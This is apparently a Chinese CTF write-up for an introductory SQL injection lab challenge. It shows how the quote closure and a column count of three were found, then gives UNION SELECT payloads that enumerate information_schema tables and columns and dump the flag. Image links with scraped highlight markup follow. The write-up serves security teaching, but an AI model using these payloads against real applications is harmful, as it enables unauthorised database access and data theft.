[第一章 web入门]SQL注入-1
- 使用1’ and 1=2 --+测试出闭合符为 ’
- 使用1’ order by 3 --+,得出字段数为3
payload
id=-1'union select 1,(select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())),3 --+
- 得出fl4g,notes
id=-1'union select 1,(select(group_concat(column_name))from(infoRmation_schema.columns)where(table_schema)like(database())AND(table_name)like('fl4g')),3 --+
- fllllag
id=-1'union select 1,(select(group_concat(fllllag))from(fl4g)),3 --+
- n1book{union_select_is_so_cool}
![[<span style='color:red;'>第一</span><span style='color:red;'>章</span> <span style='color:red;'>web</span><span style='color:red;'>入门</span>]<span style='color:red;'>SQL</span><span style='color:red;'>注入</span>-2](https://img-blog.csdnimg.cn/img_convert/0f035d9feca2dd5059c6f75fe45fede2.png)
![[<span style='color:red;'>第一</span><span style='color:red;'>章</span> <span style='color:red;'>web</span><span style='color:red;'>入门</span>]afr_<span style='color:red;'>1</span>](https://img-blog.csdnimg.cn/img_convert/a60c0ea4e49e1f0eaf06093236550aaa.png)
![【<span style='color:red;'>第一</span><span style='color:red;'>章</span> <span style='color:red;'>web</span><span style='color:red;'>入门</span>]afr_<span style='color:red;'>1</span> <span style='color:red;'>1</span>】任意文件读取](https://img-blog.csdnimg.cn/direct/3defccdea4cb4e419a1e6c45b39925c0.png)
![[<span style='color:red;'>第一</span><span style='color:red;'>章</span> <span style='color:red;'>web</span><span style='color:red;'>入门</span>]常见的搜集](https://img-blog.csdnimg.cn/img_convert/eb1ae56dfaf32e513a47795c682ab208.png)
![[<span style='color:red;'>第一</span><span style='color:red;'>章</span> <span style='color:red;'>web</span><span style='color:red;'>入门</span>]afr_3](https://img-blog.csdnimg.cn/img_convert/7a102778fefdff9d4ba46eaad6f9b1c6.png)
